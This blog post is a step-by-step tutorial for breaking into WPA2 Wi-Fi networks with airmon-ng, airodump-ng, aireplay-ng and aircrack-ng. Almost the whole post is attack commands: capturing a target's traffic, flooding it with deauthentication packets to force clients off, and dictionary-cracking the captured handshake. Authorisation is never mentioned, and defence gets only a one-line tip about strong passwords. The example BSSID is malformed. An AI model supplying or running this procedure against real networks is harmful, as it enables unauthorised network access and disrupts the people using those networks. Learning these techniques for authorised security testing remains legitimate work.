Breaking WPA2 Wireless – (Step by Step with Commands) – BT5r3 Tested


FOLLOW ARTICLE BELOW (Step by Step with Commands)

#Tools used:
airmon-ng
airodump-ng
aireplay-ng
aircrack

AD : Watch “Kali Linux For Ethical Hacking” Video Tutorial in Youtube Here >  https://www.youtube.com/playlist?list=PLEG4CvuvNZdfWvG8lVEBSHJJ8O3cbtWCu

#…Let’s begin
– Before starting, make sure you have eth0, lo, wlan0 in action. (Go to terminal and run ifconfig)
– Let’s start to monitor on the wireless interface, run:
airmon-ng start wlan0
– After executing above command, we must get a new interface mon0 (monitor mode enabled)
– Verify that both interfaces are up and running, run:
airmon-ng
– Watch for wlan0 and mon0, run :
airodump-ng mon0
– For monitoring all the APs that Kali Linux OS can find out.
#Next steps
– In this next step, notice ESSID, BSSID & ENCRYPTION (ENC) of Wireless
(in this case, let’s assume ESSID in nhc-bj, ENC is WPA2 & BSSID is 00:A1:B2:11:20:13:5T)
– CTRL+C (press)
– Run:
airodump-ng -w FILE -c 1 –bssid 00:A1:B2:11:20:13:5T mon0
(-c is for channel. Channel is 1 for the BSSID we are trying to connect to, -w is for creating new file with name FILE). With each step done by the tools, we’ll store them in the FILE we just created.
– Once you execute the above command, it starts collecting information and writes it to our file named “FILE”.
– You can leave it open, so it collects information. OR, as we discussed in earlier part of this post, you can carry out de-auth attack.
– For that, open new window and clone a session. Then execute the de-auth attack process.
– Run:
aireplay-ng -0 0 -a 00:A1:B2:11:20:13:5T mon0
(Let it run for 60sec)
– CTRL+C
– Check it out in the other window that we left open.
– CTRL+C
– Run:
ls
(you will get files as FILE-01.cap FILE-01.csv and others)
– Now, we use a dictionary attack. Run:
aircrack-ng FILE-01.cap -w /pentest/passwords/wordlists/darkc0de.lst
– The process starts for discovering a Pre-Shared Key (Password).

Conclusion: We can find hidden SSIDs, bypass MAC filters and even can crack WP2. Now, how to secure is our WiFi? Well, use really strong passwords, with mixed up contents, so that dictionary attacks would fail to locate it in itslist.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s